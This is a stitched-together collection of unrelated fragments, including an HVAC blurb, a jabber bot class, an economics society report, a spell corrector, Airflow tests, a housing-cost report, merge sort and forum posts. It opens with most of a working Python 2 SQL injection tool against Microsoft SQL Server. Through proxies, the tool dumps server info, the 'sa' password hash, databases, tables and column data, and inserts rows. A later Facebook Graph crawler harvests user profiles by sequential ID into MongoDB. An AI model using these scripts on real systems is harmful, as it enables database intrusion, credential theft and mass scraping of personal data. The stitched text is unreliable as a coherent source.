proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
opener = urllib2.build_opener(proxy_handler)
opener.open("http://www.google.com")
proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler))
file.write("\n\tProxy:"+p+"- Success")
print "\tProxy:",p,"- Success"
except:
file.write("\n\tProxy:"+p+"- Failed")
print "\tProxy:",p,"- Failed"
pass
if len(proxy_list) == 0:
print "[-] All proxies have failed. App Exiting"
sys.exit(1)
print "[+] Proxy List Complete"
file.write("\n[+] Proxy List Complete")
else:
print "[-] Proxy Not Given"
file.write("\n[+] Proxy Not Given")
proxy_list.append(urllib2.build_opener(cookie_handler))
proxy_num = 0
proxy_len = len(proxy_list)
#URL Get Function
def GetTheShit(head_URL):
try:
if arg_debug == "on":
print "\n[debug]",head_URL
file.write("\n[debug] "+head_URL)
try:
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
except urllib2.HTTPError, e:
source = e.read()
match = re.findall("value '[\d\D]*' to",source)
match = match[0][7:-4]
return match
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
# Here are the modes!
if mode == "--info":
print "[+] Displaying information about MSSQL host!\n"
file.write("\n[+] Displaying information about MSSQL host!\n")
site_URL = site+"+or+1=convert(int,(darkc0de))--"
for baseinfo in basicinfo:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(baseinfo))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
print "[-] We seem to be having a problem! Check it out manually!"
print "[-] "+str(head_URL)
print "\n[-] Done"
sys.exit(1)
if baseinfo == "@@VERSION":
ver_info = the_juice
print "[+]",baseinfo+":",the_juice
file.write("\n[+] "+baseinfo+": "+the_juice)
print "\n[+] Script detected Microsoft SQL Version:",ver_info[21:26]
file.write("\n\n[+] Script detected Microsoft SQL Version: "+ver_info[21:26])
if ver_info[25] == "0":
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(select+top+1+master.dbo.fn_varbintohexstr(password)+from+master..sysxlogins+where+name='sa'))--"
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
yesno = "Nope!"
else:
yesno = "Yes! w00t w00t! Time to break out sqlninja!"
else:
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(select+top+1+master.sys.fn_varbintohexstr(password_hash)+from+master.sys.sql_logins+where+name='sa'))--"
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
yesno = "Nope!"
else:
yesno = "Yes! w00t w00t! Time to break out sqlninja!"
print "[+] Checking to see if we can view password hashs...", yesno
file.write("\n[+] Checking to see if we can view password hashs... "+yesno)
if yesno != "Nope!":
print "[!] Dumping SA Account info:"
file.write("\n[!] Dumping SA Account info:")
print "\tUsername: SA"
file.write("\n\tUsername: SA")
print "\tSalt:",the_juice[6:14]
file.write("\n\tSalt: "+the_juice[6:14])
print "\tMixedcase:",the_juice[15:54]
file.write("\n\tMixedcase: "+the_juice[15:54])
print "\tUppercase:",the_juice[55:]
file.write("\n\tUppercase: "+the_juice[55:])
print "\tFull Hash:",the_juice
file.write("\n\tFull Hash: "+the_juice)
if mode == "--dbs":
print "[+] Displaying list of all databases on MSSQL host!\n"
file.write("\n[+] Displaying list of all databases on MSSQL host!\n")
while 1:
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(DB_NAME(darkc0de)))--"
head_URL = head_URL.replace("darkc0de",str(db_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
break
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
db_num+=1;row_num+=1
if mode == "--schema":
#List Tables
if arg_database != "None" and arg_table == "None":
print "[+] Displaying tables inside DB: "+arg_database+"\n"
file.write("\n[+] Displaying tables inside DB: "+arg_database+"\n")
site_URL = site+"+or+1=convert(int,(select+top+1+table_name+from+"+arg_database+".information_schema.tables+where+table_name+NOT+IN"
site_URL = site_URL+"+(SELECT+TOP+darkc0de+table_name+FROM+"+arg_database+".information_schema.tables+ORDER+BY+table_name)+ORDER+BY+table_name))--"
while 1:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(top_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
if str(row_num) == "1":
print "[-] We do not seem to have premissions to view this database!"
print "[-] Try again with the debug option on.. verify manually whats going on!"
break
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
top_num+=1;row_num+=1
#List Columns
if arg_table != "None":
print "[+] Displaying Columns inside DB: "+arg_database+" and Table: "+arg_table+"\n"
file.write("\n[+] Displaying Columns inside DB: "+arg_database+" and Table: "+arg_table+"\n")
site_URL = site+"+or+1=convert(int,(select+top+1+column_name+from+"+arg_database+".information_schema.columns+where+table_name='"+arg_table+"'+AND+column_name+NOT+IN"
site_URL = site_URL+"+(SELECT+TOP+darkc0de+column_name+FROM+"+arg_database+".information_schema.columns+where+table_name='"+arg_table+"'+ORDER+BY+column_name)+ORDER+BY+column_name))--"
while 1:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(top_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
if str(row_num) == "1":
print "[-] We do not seem to have premissions to view this table!"
print "[-] Try again with the debug option on.. verify manually whats going on!"
break
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
top_num+=1;row_num+=1
if mode == "--dump":
print "[+] Dumping data from DB: "+arg_database+", Table: "+arg_table+", Column: "+str(arg_columns)+"\n"
site_URL = site+"+or+1=convert(int,(select+top+1+"+col_url+"+from+"+arg_database+".."+arg_table+"+where+"+arg_columns[0]
site_URL = site_URL+"+NOT+in+(SELECT+TOP+darkc0de+"+arg_columns[0]+"+from+"+arg_database+".."+arg_table+")))--"
while 1:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(top_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
if row_num == 1:
print "[-] We seem to be having a problem!"
print "[-] Try again with the debug option on.. verify manually whats going on!"
break
break
the_juice = string.rstrip(the_juice,":")
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
top_num = int(top_num) + 1;row_num = int(row_num) + 1
if mode == "--insert":
print "[+] Inserting data into..."
print "\tDB: "+arg_database
print "\tTable: "+arg_table
print "\tColumn(s):\tData to be inserted:\n"
try:
for x in range(0, len(arg_columns)):
print "\t["+str(x)+"] "+arg_columns[x]+"\t"+arg_insert[x]
except:
pass
for column in arg_columns:
selected_col += column+","
selected_col = selected_col.rstrip(",")
for data in arg_insert:
inserted_data += "'"+data+"',"
inserted_data = inserted_data.rstrip(",")
gets+=1;proxy_num+=1
head_URL = site+";INSERT+INTO+"+arg_table+"("+selected_col+")+VALUES("+inserted_data+")--"
print "\n[!] Inserting Data....",
the_juice = GetTheShit(head_URL)
print "Done!"
print "\n[+] Was the data inserted?"
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(select+top+1+"+col_url+"+from+"+arg_database+".."+arg_table+"+where+"+arg_columns[0]+"='"+arg_insert[0]+"'))--"
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
print "\n[-] Does not look like the data was inserted!"
else:
the_juice = the_juice.rstrip(":")
print "\t"+the_juice
print "[!] Data was successfully inserted!"
# Closing Info
print "\n[-] %s" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] [%s]" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"
file.close()
|
HVAC Tip Why is my variable speed air handler not bringing the blower up to the correct speed? and common wiring mistakes to avoid.
Better indoor air, remove hot and cold spots in your home, Discover all the advantages of a variable speed fan motor on your HVAC system. |
# jsb/drivers/sleek/message.py
#
#
""" jabber message definition .. types can be normal, chat, groupchat,
headline or error
"""
## jsb imports
from jsb.utils.exception import handle_exception
from jsb.utils.trace import whichmodule
from jsb.utils.generic import toenc, fromenc, jabberstrip
from jsb.utils.locking import lockdec
from jsb.lib.eventbase import EventBase
from jsb.lib.errors import BotNotSetInEvent
from jsb.lib.gozerevent import GozerEvent
## basic imports
import types
import time
import thread
import logging
import re
## locks
replylock = thread.allocate_lock()
replylocked = lockdec(replylock)
## classes
class Message(GozerEvent):
""" jabber message object. """
def __init__(self, nodedict={}):
self.element = "message"
self.jabber = True
self.cmnd = "MESSAGE"
self.cbtype = "MESSAGE"
self.bottype = "xmpp"
self.type = "normal"
self.speed = 8
GozerEvent.__init__(self, nodedict)
def __copy__(self):
return Message(self)
def __deepcopy__(self, bla):
m = Message()
m.copyin(self)
return m
def parse(self, data, bot=None):
""" set ircevent compat attributes. """
logging.info("starting parse on %s" % str(data))
self.bot = bot
self.jidchange = False
self.jid = str(data['from'])
self.type = data['type']
if not self.jid: logging.error("can't detect origin - %s" % data) ; return
try: self.resource = self.jid.split('/')[1]
except IndexError: pass
self.channel = self.jid.split('/')[0]
self.origchannel = self.channel
self.nick = self.resource
self.ruserhost = self.jid
self.userhost = self.jid
self.stripped = self.jid.split('/')[0]
self.printto = self.channel
try: self.txt = str(data['body']) ; self.nodispatch = False
except AttributeError: self.txt = "" ; self.nodispatch = True
self.time = time.time()
logging.warn("message type is %s" % self.type)
if self.type == 'groupchat':
self.groupchat = True
self.auth = self.userhost
else:
self.showall = True
self.groupchat = False
self.auth = self.stripped
self.nick = self.jid.split("@")[0]
self.msg = not self.groupchat
self.fromm = self.jid
self.makeargs()
self.bind(self.bot)
self.issleek = True
return self
def errorHandler(self):
""" dispatch errors to their handlers. """
try:
code = self.get('error').code
except Exception, ex:
handle_exception()
try:
method = getattr(self, "handle_%s" % code)
if method:
logging.error('sxmpp.core - dispatching error to handler %s' % str(method))
method(self)
except AttributeError, ex: logging.error('sxmpp.core - unhandled error %s' % code)
except: handle_exception()
def normalize(self, what):
return self.bot.normalize(what)
|
THE SOCIETY IS THE LEADING LEARNED SOCIETY for economists in the world, and the world-wide coverage is becoming even more important as economic science expands in regions outside of its traditional strongholds in North America and Europe. It has been both a privilege and a pleasure to serve as the Society’s President in the year of 2008.
One of the Society’s major activities is to publish high-quality research so as to further the objective of supporting economics with a quantitative-theoretical and quantitative-empirical orientation. The flagship journal Econometrica continues to be very well managed thanks to the devoted work by the Editor, Stephen Morris, assisted in the Princeton editorial office by Mary Beth Bellando, as well as the efforts of the six Co-editors, and many Associate editors. The Society’s Monograph Series was effec- tively edited by Andrew Chesher and George Mailath. In 2008, the Society also took important steps towards adding two new journals to its publications—more about this in Section 4 below. |
import json
import urllib2
#from threading import *
from pymongo import MongoClient
from xml.dom import minidom
from dicttoxml import dicttoxml
"""
t = Thread(target = conn_scan, args = (tgtHost, int(tgtPort)))
t.start()
"""
#screenLock = Semaphore(value = 1)
baseUrl = "http://graph.facebook.com/"
secureBaseUrl = "https://graph.facebook.com/"
token = "asdfasdf"
log = 0
# Kick off a crawler
def crawl(xmlFile):
xmldoc = minidom.parse('settings.xml')
crawlSettings = xmldoc.getElementsByTagName('crawl')
start = int(crawlSettings[0].attributes['start'].value)
end = int(crawlSettings[1].attributes['end'].value)
mongoSettings = xmldoc.getElementsByTagName('mongo')
ipAddress = mongoSettings[0].attributes['ip'].value
port = int(mongoSettings[1].attributes['port'].value)
log = int(mongoSettings[2].attributes['log'].value)
fbTokenSettings = xmldoc.getElementsByTagName('fb')
token = fbTokenSettings[0].attributes['token'].value
if log == 1:
client = MongoClient(ipAddress, port)
db = client.facebookCrawler
users = db.users
userCount = 0
print "Starting crawl...Start: %s, End: %s" % (start, end)
for x in range(start, end):
try:
if x % 100 == 0:
print "Working...%s\n" % (x)
urlToVisit = baseUrl + str(x);
data = json.load(urllib2.urlopen(urlToVisit))
if log == 1:
users.insert(data)
userCount += 1
print data['name']
except:
pass
print "\n" + str(userCount) + " Results Found!"
print "Done crawling"
# Kick off a crawler with privileges
def crawl_priv(xmlFile):
xmldoc = minidom.parse('settings.xml')
crawlSettings = xmldoc.getElementsByTagName('crawl')
start = int(crawlSettings[0].attributes['start'].value)
end = int(crawlSettings[1].attributes['end'].value)
mongoSettings = xmldoc.getElementsByTagName('mongo')
ipAddress = mongoSettings[0].attributes['ip'].value
port = int(mongoSettings[1].attributes['port'].value)
log = int(mongoSettings[2].attributes['log'].value)
fbTokenSettings = xmldoc.getElementsByTagName('fb')
token = fbTokenSettings[0].attributes['token'].value
if log == 1:
client = MongoClient(ipAddress, port)
db = client.facebookCrawler
users = db.users
userCount = 0
print "Starting crawl with privileges...Start: %s, End: %s" % (start, end)
for x in range(start, end):
try:
if x % 100 == 0:
print "Working...%s\n" % (x)
urlToVisit = secureBaseUrl + str(x) + '?access_token=' + str(token)
data = json.load(urllib2.urlopen(urlToVisit))
if log == 1:
users.insert(data)
userCount += 1
print data['name']
except:
pass
print "\n" + str(userCount) + " Results Found!"
print "Done crawling"
# Search for a user
def search(xmlFile, name):
xmldoc = minidom.parse('settings.xml')
crawlSettings = xmldoc.getElementsByTagName('fb')
token = crawlSettings[0].attributes['token'].value
name = name.replace(" ", "%20")
url = secureBaseUrl + 'search?q=' + str(name) + '&type=user&access_token=' + str(token)
count = 1
try:
data = json.load(urllib2.urlopen(url))
print "Search returned %s results" % len(data['data'])
for x in range(0, len(data['data'])):
print count, '-', data['data'][x]['name']
count = count + 1
except:
print "Error retrieving search results"
# See what metadata you can get from a User
def meta(xmlFile, username):
xmldoc = minidom.parse('settings.xml')
crawlSettings = xmldoc.getElementsByTagName('fb')
token = crawlSettings[0].attributes['token'].value
url = secureBaseUrl + str(username) + '?metadata=1&access_token=' + str(token)
count = 1
try:
data = json.load(urllib2.urlopen(url))
for k, v in data['metadata']['connections'].items():
print count, '-', k
count = count + 1
xmldata = dicttoxml(data)
with open(username + "_metadata.xml", 'w') as file_handle:
file_handle.write(xmldata)
except:
print "Error retrieving metadata\n"
# Crawl a specific user
def username(xmlFile, user):
xmldoc = minidom.parse('settings.xml')
crawlSettings = xmldoc.getElementsByTagName('fb')
token = crawlSettings[0].attributes['token'].value
url = secureBaseUrl + str(user) + '?access_token=' + str(token)
count = 1
try:
data = json.load(urllib2.urlopen(url))
xmldata = dicttoxml(data)
with open(user + ".xml", 'w') as file_handle:
file_handle.write(xmldata)
except:
print "Error retrieving user data\n"
|
By Studio 1-B. Also with 8-bit music.
40 queries in 0.216 seconds. |
import re, collections
def words(text): return re.findall('[a-z]+', text.lower())
def train(features):
model = collections.defaultdict(lambda: 1)
for f in features:
model[f] += 1
return model
NWORDS = train(words(file('big.txt').read()))
alphabet = 'abcdefghijklmnopqrstuvwxyz'
def edits1(word):
splits = [(word[:i], word[i:]) for i in range(len(word) + 1)]
deletes = [a + b[1:] for a, b in splits if b]
transposes = [a + b[1] + b[0] + b[2:] for a, b in splits if len(b)>1]
replaces = [a + c + b[1:] for a, b in splits for c in alphabet if b]
inserts = [a + c + b for a, b in splits for c in alphabet]
return set(deletes + transposes + replaces + inserts)
def known_edits2(word):
return set(e2 for e1 in edits1(word) for e2 in edits1(e1) if e2 in NWORDS)
def known(words): return set(w for w in words if w in NWORDS)
def correct(word):
candidates = known([word]) or known(edits1(word)) or known_edits2(word) or [word]
return max(candidates, key=NWORDS.get)
|
Want to try SCUBA diving and see what it's like?
After a briefing and some basics the instructor takes you underwater to try diving in shallow end of the pool and have some fun.
Everyone needs to fill out some paperwork before the class and kids must have a parents signature. |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import sys
import unittest
from copy import deepcopy
from airflow import configuration
from airflow.exceptions import AirflowException
from airflow.contrib.operators.ecs_operator import ECSOperator
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
RESPONSE_WITHOUT_FAILURES = {
"failures": [],
"tasks": [
{
"containers": [
{
"containerArn":
"arn:aws:ecs:us-east-1:012345678910:container/e1ed7aac-d9b2-4315-8726-d2432bf11868",
"lastStatus": "PENDING",
"name": "wordpress",
"taskArn": "arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55"
}
],
"desiredStatus": "RUNNING",
"lastStatus": "PENDING",
"taskArn": "arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55",
"taskDefinitionArn": "arn:aws:ecs:us-east-1:012345678910:task-definition/hello_world:11"
}
]
}
class TestECSOperator(unittest.TestCase):
@mock.patch('airflow.contrib.operators.ecs_operator.AwsHook')
def setUp(self, aws_hook_mock):
configuration.load_test_config()
self.aws_hook_mock = aws_hook_mock
self.ecs = ECSOperator(
task_id='task',
task_definition='t',
cluster='c',
overrides={},
aws_conn_id=None,
region_name='eu-west-1',
group='group',
placement_constraints=[
{
'expression': 'attribute:ecs.instance-type =~ t2.*',
'type': 'memberOf'
}
],
network_configuration={
'awsvpcConfiguration': {
'securityGroups': ['sg-123abc']
}
}
)
def test_init(self):
self.assertEqual(self.ecs.region_name, 'eu-west-1')
self.assertEqual(self.ecs.task_definition, 't')
self.assertEqual(self.ecs.aws_conn_id, None)
self.assertEqual(self.ecs.cluster, 'c')
self.assertEqual(self.ecs.overrides, {})
self.assertEqual(self.ecs.hook, self.aws_hook_mock.return_value)
self.aws_hook_mock.assert_called_once_with(aws_conn_id=None)
def test_template_fields_overrides(self):
self.assertEqual(self.ecs.template_fields, ('overrides',))
@mock.patch.object(ECSOperator, '_wait_for_task_ended')
@mock.patch.object(ECSOperator, '_check_success_task')
def test_execute_without_failures(self, check_mock, wait_mock):
client_mock = self.aws_hook_mock.return_value.get_client_type.return_value
client_mock.run_task.return_value = RESPONSE_WITHOUT_FAILURES
self.ecs.execute(None)
self.aws_hook_mock.return_value.get_client_type.assert_called_once_with('ecs',
region_name='eu-west-1')
client_mock.run_task.assert_called_once_with(
cluster='c',
launchType='EC2',
overrides={},
startedBy=mock.ANY, # Can by 'airflow' or 'Airflow'
taskDefinition='t',
group='group',
placementConstraints=[
{
'expression': 'attribute:ecs.instance-type =~ t2.*',
'type': 'memberOf'
}
],
platformVersion='LATEST',
networkConfiguration={
'awsvpcConfiguration': {
'securityGroups': ['sg-123abc']
}
}
)
wait_mock.assert_called_once_with()
check_mock.assert_called_once_with()
self.assertEqual(self.ecs.arn,
'arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55')
def test_execute_with_failures(self):
client_mock = self.aws_hook_mock.return_value.get_client_type.return_value
resp_failures = deepcopy(RESPONSE_WITHOUT_FAILURES)
resp_failures['failures'].append('dummy error')
client_mock.run_task.return_value = resp_failures
with self.assertRaises(AirflowException):
self.ecs.execute(None)
self.aws_hook_mock.return_value.get_client_type.assert_called_once_with('ecs',
region_name='eu-west-1')
client_mock.run_task.assert_called_once_with(
cluster='c',
launchType='EC2',
overrides={},
startedBy=mock.ANY, # Can by 'airflow' or 'Airflow'
taskDefinition='t',
group='group',
placementConstraints=[
{
'expression': 'attribute:ecs.instance-type =~ t2.*',
'type': 'memberOf'
}
],
platformVersion='LATEST',
networkConfiguration={
'awsvpcConfiguration': {
'securityGroups': ['sg-123abc']
}
}
)
def test_wait_end_tasks(self):
client_mock = mock.Mock()
self.ecs.arn = 'arn'
self.ecs.client = client_mock
self.ecs._wait_for_task_ended()
client_mock.get_waiter.assert_called_once_with('tasks_stopped')
client_mock.get_waiter.return_value.wait.assert_called_once_with(
cluster='c', tasks=['arn'])
self.assertEqual(
sys.maxsize, client_mock.get_waiter.return_value.config.max_attempts)
def test_check_success_tasks_raises(self):
client_mock = mock.Mock()
self.ecs.arn = 'arn'
self.ecs.client = client_mock
client_mock.describe_tasks.return_value = {
'tasks': [{
'containers': [{
'name': 'foo',
'lastStatus': 'STOPPED',
'exitCode': 1
}]
}]
}
with self.assertRaises(Exception) as e:
self.ecs._check_success_task()
# Ordering of str(dict) is not guaranteed.
self.assertIn("This task is not in success state ", str(e.exception))
self.assertIn("'name': 'foo'", str(e.exception))
self.assertIn("'lastStatus': 'STOPPED'", str(e.exception))
self.assertIn("'exitCode': 1", str(e.exception))
client_mock.describe_tasks.assert_called_once_with(
cluster='c', tasks=['arn'])
def test_check_success_tasks_raises_pending(self):
client_mock = mock.Mock()
self.ecs.client = client_mock
self.ecs.arn = 'arn'
client_mock.describe_tasks.return_value = {
'tasks': [{
'containers': [{
'name': 'container-name',
'lastStatus': 'PENDING'
}]
}]
}
with self.assertRaises(Exception) as e:
self.ecs._check_success_task()
# Ordering of str(dict) is not guaranteed.
self.assertIn("This task is still pending ", str(e.exception))
self.assertIn("'name': 'container-name'", str(e.exception))
self.assertIn("'lastStatus': 'PENDING'", str(e.exception))
client_mock.describe_tasks.assert_called_once_with(
cluster='c', tasks=['arn'])
def test_check_success_tasks_raises_multiple(self):
client_mock = mock.Mock()
self.ecs.client = client_mock
self.ecs.arn = 'arn'
client_mock.describe_tasks.return_value = {
'tasks': [{
'containers': [{
'name': 'foo',
'exitCode': 1
}, {
'name': 'bar',
'lastStatus': 'STOPPED',
'exitCode': 0
}]
}]
}
self.ecs._check_success_task()
client_mock.describe_tasks.assert_called_once_with(
cluster='c', tasks=['arn'])
def test_host_terminated_raises(self):
client_mock = mock.Mock()
self.ecs.client = client_mock
self.ecs.arn = 'arn'
client_mock.describe_tasks.return_value = {
'tasks': [{
'stoppedReason': 'Host EC2 (instance i-1234567890abcdef) terminated.',
"containers": [
{
"containerArn": "arn:aws:ecs:us-east-1:012345678910:container/e1ed7aac-d9b2-4315-8726-d2432bf11868", # noqa: E501
"lastStatus": "RUNNING",
"name": "wordpress",
"taskArn": "arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55" # noqa: E501
}
],
"desiredStatus": "STOPPED",
"lastStatus": "STOPPED",
"taskArn": "arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55", # noqa: E501
"taskDefinitionArn": "arn:aws:ecs:us-east-1:012345678910:task-definition/hello_world:11" # noqa: E501
}]
}
with self.assertRaises(AirflowException) as e:
self.ecs._check_success_task()
self.assertIn(
"The task was stopped because the host instance terminated:",
str(e.exception))
self.assertIn("Host EC2 (", str(e.exception))
self.assertIn(") terminated", str(e.exception))
client_mock.describe_tasks.assert_called_once_with(
cluster='c', tasks=['arn'])
def test_check_success_task_not_raises(self):
client_mock = mock.Mock()
self.ecs.client = client_mock
self.ecs.arn = 'arn'
client_mock.describe_tasks.return_value = {
'tasks': [{
'containers': [{
'name': 'container-name',
'lastStatus': 'STOPPED',
'exitCode': 0
}]
}]
}
self.ecs._check_success_task()
client_mock.describe_tasks.assert_called_once_with(
cluster='c', tasks=['arn'])
if __name__ == '__main__':
unittest.main()
|
According to Cushman & Wakefield's latest Q2 Residential Aggregator, out today, the inexorable rise in build costs continues to be one of the main causes for concern in the property industry, with build costs rising by over 6% per annum over the past two years. There was a slowdown in the rate of inflation during the first half of 2014; however, the growth rate has picked up again in recent months and during Q1 2015 costs rose at an annualised rate of 3%.
Costs are coming under increasing upward pressure partly due to the rising cost of material, the price of bricks for example rose by 9% in the first six months of 2015. However, the primary driver of cost inflation is the severe shortage of skills facing the construction industry, which is resulting in significant upward pressure on wages.
Looking ahead the picture isn’t expected to change much over the short term. The latest C&W consensus build cost forecasts predict that costs will rise by 6% in 2015 and a further 5% in 2016, which compares to house price growth in London of 3% and 5%. The continuation of costs rising faster than prices will likely result in stable land prices moving forward.
The recent election campaign bought into focus the countries inability to build enough homes. While London continues to fall short in the number of houses built each year, the number of starts and completions is increasing. The latest figures from DCLG show that the number of homes built in Q1 2015 was the highest quarterly total in three years and there were 9,500 houses started, which is the highest quarterly total in over 25 years.
Looking ahead the uplift in construction starts is a welcome sign for London; however, with build costs forecast to continue their rise and land in short supply this is likely to be a temporary uplift and will do little to solve the supply and demand imbalance in the capital. |
def threeway_compare(x,y):
if x < y:
return -1
elif x == y:
return 0
else:
return 1
def merge(left, right, compare = threeway_compare):
result = []
i, j = 0, 0
while i < len(left) and j < len(right):
if compare(left[i], right[j]) <= 0:
result.append(left[i])
i += 1
else:
result.append(right[j])
j += 1
result += left[i:]
result += right[j:]
return result
def merge_sort(lst, compare = threeway_compare):
if len(lst) <= 1:
return lst
else:
middle = int(len(lst) / 2)
left = merge_sort(lst[:middle], compare)
right = merge_sort(lst[middle:], compare)
return merge(left, right, compare)
if __name__ == "__main__":
cmp = lambda x,y: -1 if x < y else (0 if x == y else 1)
assert merge_sort([], cmp) == []
assert merge_sort([1], cmp) == [1]
assert merge_sort([1,2], cmp) == [1,2]
assert merge_sort([2,1], cmp) == [1,2]
assert merge_sort([1,2,3]) == [1,2,3]
assert merge_sort([2,1,3], cmp) == [1,2,3]
assert merge_sort([3,2,1], cmp) == [1,2,3]
assert merge_sort([3,4,8,0,6,7,4,2,1,9,4,5]) == [0,1,2,3,4,4,4,5,6,7,8,9]
print('all tests passed!')
|
Hmm, not sure what happened - nothing useful in the logs that I can see. If anyone was online and paying attention when it happened let me know if you noticed anything relevant going on at the time.
I hosted a game on 1.8.1 beta, started it, when it loaded it said disconnected from metaserver or something. Didn't notice anything unusual, aside from the metaserver message which I hadn't seen before.
must have overloaded from how many people were online ! |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.